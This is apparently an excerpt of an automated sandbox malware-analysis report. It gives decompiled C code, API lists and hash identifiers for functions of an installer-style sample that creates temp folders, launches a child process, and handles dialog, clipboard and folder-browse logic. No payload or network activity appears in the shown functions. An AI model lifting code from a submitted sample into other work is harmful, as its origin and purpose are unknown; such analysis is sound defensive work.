                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                            • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                            • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                            0x00405c1c
                            0x00405c24
                            0x00000000
                            0x00405c2a
                            0x00000000

                            APIs
                            • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                            • GetLastError.KERNEL32 ref: 00405C2A
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CreateDirectoryErrorLast
                            • String ID:
                            • API String ID: 1375471231-0
                            • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                            • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                            • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                            • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                            0x00403606
                            0x0040360c

                            APIs
                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                            0x00401faa
                            0x00401faf
                            0x00401fb5
                            0x00401fba
                            0x00401fbe
                            0x0040292e
                            0x00401fc4
                            0x00401fc7
                            0x00401fca
                            0x00401fd2
                            0x00401fe1
                            0x00401fe3
                            0x00401fe3
                            0x00401fd4
                            0x00401fd8
                            0x00401fd8
                            0x00401fd2
                            0x00401fea
                            0x00401feb
                            0x00401feb
                            0x00402c2d
                            0x00402c39

                            APIs
                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                              • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                              • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                              • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                              • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                            • String ID:
                            • API String ID: 2972824698-0
                            • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                            • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                            • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                            • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 95%
                            			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                            0x00405811
                            0x00405817
                            0x00405821
                            0x00405824
                            0x004059ba
                            0x004059de
                            0x004059de
                            0x004059f1
                            0x00405a0f
                            0x00405a11
                            0x00405a19
                            0x00405a6f
                            0x00405a73
                            0x00000000
                            0x00000000
                            0x00405a75
                            0x00405a7b
                            0x00000000
                            0x00000000
                            0x00405a85
                            0x00405a8d
                            0x00405a90
                            0x00405b92
                            0x00000000
                            0x00405b92
                            0x00405a9f
                            0x00405aaa
                            0x00405ab3
                            0x00405abe
                            0x00405ac1
                            0x00405aca
                            0x00405ad0
                            0x00405ad3
                            0x00405ad3
                            0x00405aeb
                            0x00405af4
                            0x00405af7
                            0x00405afe
                            0x00405b05
                            0x00405b0d
                            0x00405b0d
                            0x00405b24
                            0x00405b24
                            0x00405b2b
                            0x00405b31
                            0x00405b3d
                            0x00405b44
                            0x00405b4d
                            0x00405b4f
                            0x00405b52
                            0x00405b61
                            0x00405b64
                            0x00405b6a
                            0x00405b6b
                            0x00405b71
                            0x00405b72
                            0x00405b73
                            0x00405b7b
                            0x00405b86
                            0x00405b8c
                            0x00405b8c
                            0x00000000
                            0x00405aeb
                            0x00405a21
                            0x00405a51
                            0x00405a59
                            0x00405a64
                            0x00405a64
                            0x00405a6a
                            0x00000000
                            0x00405a6a
                            0x00405a25
                            0x00405a2f
                            0x00000000
                            0x004059f3
                            0x004059f9
                            0x00405a34
                            0x00000000
                            0x00405a3d
                            0x00405a02
                            0x00405a07
                            0x00405a0a
                            0x00000000
                            0x00405a0a
                            0x004059f1
                            0x0040582a
                            0x0040582e
                            0x00405836
                            0x0040583a
                            0x0040583d
                            0x00405840
                            0x00405843
                            0x00405846
                            0x00405847
                            0x00405848
                            0x00405861
                            0x00405864
                            0x0040586e
                            0x0040587d
                            0x00405885
                            0x0040588d
                            0x00405892
                            0x00405895
                            0x004058a1
                            0x004058aa
                            0x004058b3
                            0x004058d5
                            0x004058db
                            0x004058ec
                            0x004058f1
                            0x004058ff
                            0x0040590d
                            0x0040590d
                            0x00405912
                            0x00405920
                            0x00405920
                            0x00405925
                            0x00405928
                            0x0040592d
                            0x00405939
                            0x00405942
                            0x0040594f
                            0x0040595e
                            0x00405951
                            0x00405956
                            0x00405956
                            0x0040596a
                            0x0040596a
                            0x0040597e
                            0x00405987
                            0x00405990
                            0x004059a0
                            0x004059ac
                            0x004059ac
                            0x00000000

                            APIs
                            • GetDlgItem.USER32 ref: 00405867
                            • GetDlgItem.USER32 ref: 00405876
                            • GetClientRect.USER32 ref: 004058B3
                            • GetSystemMetrics.USER32 ref: 004058BA
                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                            • ShowWindow.USER32(?,00000008), ref: 00405956
                            • GetDlgItem.USER32 ref: 00405977
                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                            • GetDlgItem.USER32 ref: 00405885
                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                            • GetDlgItem.USER32 ref: 004059C9
                            • CreateThread.KERNEL32 ref: 004059D7
                            • CloseHandle.KERNEL32(00000000), ref: 004059DE
                            • ShowWindow.USER32(00000000), ref: 00405A02
                            • ShowWindow.USER32(?,00000008), ref: 00405A07
                            • ShowWindow.USER32(00000008), ref: 00405A51
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                            • CreatePopupMenu.USER32 ref: 00405A96
                            • AppendMenuW.USER32 ref: 00405AAA
                            • GetWindowRect.USER32 ref: 00405ACA
                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                            • OpenClipboard.USER32(00000000), ref: 00405B2B
                            • EmptyClipboard.USER32 ref: 00405B31
                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                            • GlobalLock.KERNEL32 ref: 00405B47
                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                            • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                            • SetClipboardData.USER32 ref: 00405B86
                            • CloseClipboard.USER32 ref: 00405B8C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                            • String ID: H7B${
                            • API String ID: 590372296-2256286769
                            • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                            • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                            • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                            • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                            0x00404ab5
                            0x00404abb
                            0x00404ac1
                            0x00404ace
                            0x00404adc
                            0x00404adf
                            0x00404ae7
                            0x00404aed
                            0x00404aed
                            0x00404af9
                            0x00404afc
                            0x00404b6a
                            0x00404b71
                            0x00404c48
                            0x00404c4f
                            0x00404c5e
                            0x00404c5e
                            0x00404c62
                            0x00404c6c
                            0x00404c79
                            0x00404c7b
                            0x00404c7b
                            0x00404c89
                            0x00404c90
                            0x00404c97
                            0x00404c9a
                            0x00404cd6
                            0x00404cd8
                            0x00404cde
                            0x00404ce3
                            0x00404ce7
                            0x00404ce9
                            0x00404ce9
                            0x00404d05
                            0x00000000
                            0x00404d07
                            0x00404d0a
                            0x00404d18
                            0x00404d1e
                            0x00404d1f
                            0x00404d22
                            0x00404d25
                            0x00000000
                            0x00404d25
                            0x00404c9c
                            0x00404c9e
                            0x00404ca2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00404ca4
                            0x00404ca4
                            0x00404cb1
                            0x00404cb6
                            0x00000000
                            0x00000000
                            0x00404cba
                            0x00404cbc
                            0x00404cbc
                            0x00404cc5
                            0x00404cc7
                            0x00404ccc
                            0x00404ccf
                            0x00404cd4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00404cd4
                            0x00404d31
                            0x00404d3b
                            0x00404d3e
                            0x00404d41
                            0x00404d48
                            0x00404d48
                            0x00404d4a
                            0x00404d4a
                            0x00404d4f
                            0x00404d51
                            0x00404d59
                            0x00404d60
                            0x00404d62
                            0x00404d6d
                            0x00404d6d
                            0x00404d62
                            0x00404d7d
                            0x00404d87
                            0x00404d8f
                            0x00404daa
                            0x00404d91
                            0x00404d9a
                            0x00404d9a
                            0x00404d8f
                            0x00404daf
                            0x00404db4
                            0x00404db9
                            0x00404dc2
                            0x00404dc2
                            0x00404dcb
                            0x00404dcd
                            0x00404dcd
                            0x00404dd9
                            0x00404de1
                            0x00404deb
                            0x00404deb
                            0x00404df0
                            0x00000000
                            0x00404df0
                            0x00404c9a
                            0x00404c51
                            0x00404c58
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00404c58
                            0x00404b77
                            0x00404b80
                            0x00404b9a
                            0x00404b9f
                            0x00404ba9
                            0x00404bb0
                            0x00404bbc
                            0x00404bbf
